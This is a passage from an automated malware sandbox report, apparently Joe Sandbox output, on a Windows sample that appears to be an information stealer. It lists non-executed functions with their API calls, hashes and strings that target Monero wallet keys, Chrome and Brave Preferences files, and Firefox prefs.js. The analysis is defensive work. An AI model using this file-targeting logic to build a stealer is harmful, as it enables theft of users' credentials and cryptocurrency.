                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 3ac4c6333ef17b0d26144d7a52804a8c6a20462735183861134b8e526b4c5688
                      • Instruction ID: 8bae7e1fdc87ac7cc9f24c8ceca891c01ecd7a22c634711c24ceb57deeef1c10
                      • Opcode Fuzzy Hash: 3ac4c6333ef17b0d26144d7a52804a8c6a20462735183861134b8e526b4c5688
                      • Instruction Fuzzy Hash: 6DE012B6D1435163CB0273F2BC0BB6A339E5B54345F08552AFA09D6282FA25F9108566

                      Non-executed Functions

                      Function 003E38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 003E38CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 003E38E3
                      • lstrcat.KERNEL32(?,?), ref: 003E3935
                      • StrCmpCA.SHLWAPI(?,003F0F70), ref: 003E3947
                      • StrCmpCA.SHLWAPI(?,003F0F74), ref: 003E395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003E3C67
                      • FindClose.KERNEL32(000000FF), ref: 003E3C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 21abec51bd794528107fdae2820729390f86c2bd46d59960bdce34647417de89
                      • Instruction ID: 4367c79ded5e04cf19abfad50638ebe732007fb43b022934e60c3699cd0a75fd
                      • Opcode Fuzzy Hash: 21abec51bd794528107fdae2820729390f86c2bd46d59960bdce34647417de89
                      • Instruction Fuzzy Hash: E5A142B1900258ABDB25DFA5DC89FFA7379BF44300F088689F60D96181DB759B84CF52
                      Function 003DBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,003F0B32,003F0B2B,00000000,?,?,?,003F13F4,003F0B2A), ref: 003DBEF5
                      • StrCmpCA.SHLWAPI(?,003F13F8), ref: 003DBF4D
                      • StrCmpCA.SHLWAPI(?,003F13FC), ref: 003DBF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DC7BF
                      • FindClose.KERNEL32(000000FF), ref: 003DC7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: a4c57f67ffda330a2b33a4d817843ed54975b49a23856753315f24dfa2c9f89a
                      • Instruction ID: 7e23074e1039b46c5da9691bb5349328499aeb873efe36fcc5c876c6f35cc660
                      • Opcode Fuzzy Hash: a4c57f67ffda330a2b33a4d817843ed54975b49a23856753315f24dfa2c9f89a
                      • Instruction Fuzzy Hash: BD42B572910158ABDB16FBB1DC96EED733DAF84300F418659F5069A1C1EF30AB49CB92
                      Function 003E4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 003E492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 003E4943
                      • StrCmpCA.SHLWAPI(?,003F0FDC), ref: 003E4971
                      • StrCmpCA.SHLWAPI(?,003F0FE0), ref: 003E4987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003E4B7D
                      • FindClose.KERNEL32(000000FF), ref: 003E4B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: fbe3c19f2b0e012cec9f5cce30dbca1df3965853d12709fd51eb8e6da5253211
                      • Instruction ID: 1d77faf438e0685dd4be8d4199d6b056444aedc42d232aaaeb039d064bd06164
                      • Opcode Fuzzy Hash: fbe3c19f2b0e012cec9f5cce30dbca1df3965853d12709fd51eb8e6da5253211
                      • Instruction Fuzzy Hash: AA6178B6900218ABCB25EFE4DC45EFA737DBB48700F048689F64996181EB74EB45CF91
                      Function 003E4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003E4580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E4587
                      • wsprintfA.USER32 ref: 003E45A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 003E45BD
                      • StrCmpCA.SHLWAPI(?,003F0FC4), ref: 003E45EB
                      • StrCmpCA.SHLWAPI(?,003F0FC8), ref: 003E4601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003E468B
                      • FindClose.KERNEL32(000000FF), ref: 003E46A0
                      • lstrcat.KERNEL32(?,0108E948), ref: 003E46C5
                      • lstrcat.KERNEL32(?,0108D780), ref: 003E46D8
                      • lstrlen.KERNEL32(?), ref: 003E46E5
                      • lstrlen.KERNEL32(?), ref: 003E46F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: 9ecb2d3474d4ccf665a5e678514913af56c82b393564abdebb842d16388f6402
                      • Instruction ID: dbe1df3d3ea9f4bc76344313730d87e284e8b3ae78fd9109a528d5b927e1f745
                      • Opcode Fuzzy Hash: 9ecb2d3474d4ccf665a5e678514913af56c82b393564abdebb842d16388f6402
                      • Instruction Fuzzy Hash: 8551A8B6900218ABC725EBB0DC89FFD737DAB58300F448689F609961D1EB749B85CF91
                      Function 003E3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 003E3EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 003E3EDA
                      • StrCmpCA.SHLWAPI(?,003F0FAC), ref: 003E3F08
                      • StrCmpCA.SHLWAPI(?,003F0FB0), ref: 003E3F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003E406C
                      • FindClose.KERNEL32(000000FF), ref: 003E4081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s
                      • API String ID: 180737720-4073750446
                      • Opcode ID: f6996a2a3d2f75f9eaa76160f0900a456afa2fc9ec01855a913c817cb568e4ec
                      • Instruction ID: 0aeed88e7fd10a7472c786fbdca006c994b500844cf1f24674b59ebc98c90aef
                      • Opcode Fuzzy Hash: f6996a2a3d2f75f9eaa76160f0900a456afa2fc9ec01855a913c817cb568e4ec
                      • Instruction Fuzzy Hash: 705199B6900218ABCB25EBF0DC85EFA737DBB44300F048689F25996181DB75EB86CF51
                      Function 003DED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 003DED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 003DED55
                      • StrCmpCA.SHLWAPI(?,003F1538), ref: 003DEDAB
                      • StrCmpCA.SHLWAPI(?,003F153C), ref: 003DEDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DF2AE
                      • FindClose.KERNEL32(000000FF), ref: 003DF2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: 25db750e31029aae079c23905112134df111e5903878ed88ff4eb975c95e1e76
                      • Instruction ID: 6ba2f99d0101a7f72cc03260752932d0377754eeff00c41d78eb2e0475f1b2e2
                      • Opcode Fuzzy Hash: 25db750e31029aae079c23905112134df111e5903878ed88ff4eb975c95e1e76
                      • Instruction Fuzzy Hash: 29E176728116689AEB56FB61DC91EEE773DAF50300F414299B40A660D2EF307F8ACF51
                      Function 003DF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003F15B8,003F0D96), ref: 003DF71E
                      • StrCmpCA.SHLWAPI(?,003F15BC), ref: 003DF76F
                      • StrCmpCA.SHLWAPI(?,003F15C0), ref: 003DF785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DFAB1
                      • FindClose.KERNEL32(000000FF), ref: 003DFAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: eb5ba53ab5488c27e1ebf4c837144de1fe1b78134e2824b86c5b6614e48a130a
                      • Instruction ID: 90f96f5bee64513c5e4d0add5ce17a78e872b0875585252b7ff28e55d5f3b098
                      • Opcode Fuzzy Hash: eb5ba53ab5488c27e1ebf4c837144de1fe1b78134e2824b86c5b6614e48a130a
                      • Instruction Fuzzy Hash: 5AB175729006589FDB26FF61DC91BED7779AF54300F0186A9E40A9A1C1EF306B49CF92
                      Function 003D16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003F510C,?,?,?,003F51B4,?,?,00000000,?,00000000), ref: 003D1923
                      • StrCmpCA.SHLWAPI(?,003F525C), ref: 003D1973
                      • StrCmpCA.SHLWAPI(?,003F5304), ref: 003D1989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003D1D40
                      • DeleteFileA.KERNEL32(00000000), ref: 003D1DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003D1E20
                      • FindClose.KERNEL32(000000FF), ref: 003D1E32
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: 38f3830eeade43c3bed18e9e807b703b86ddac48aa246f55e30181550280088d
                      • Instruction ID: f1e0ae07ac1fb6570374382d782e7114224aac822bed9e24f18bb26a2f23ca4d
                      • Opcode Fuzzy Hash: 38f3830eeade43c3bed18e9e807b703b86ddac48aa246f55e30181550280088d
                      • Instruction Fuzzy Hash: 5E125171910568ABDB16FB61DC96EEE7379AF14300F414299B10A6A0D1EF307F89CFA1
                      Function 003DDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003F0C2E), ref: 003DDE5E
                      • StrCmpCA.SHLWAPI(?,003F14C8), ref: 003DDEAE
                      • StrCmpCA.SHLWAPI(?,003F14CC), ref: 003DDEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DE3E0
                      • FindClose.KERNEL32(000000FF), ref: 003DE3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
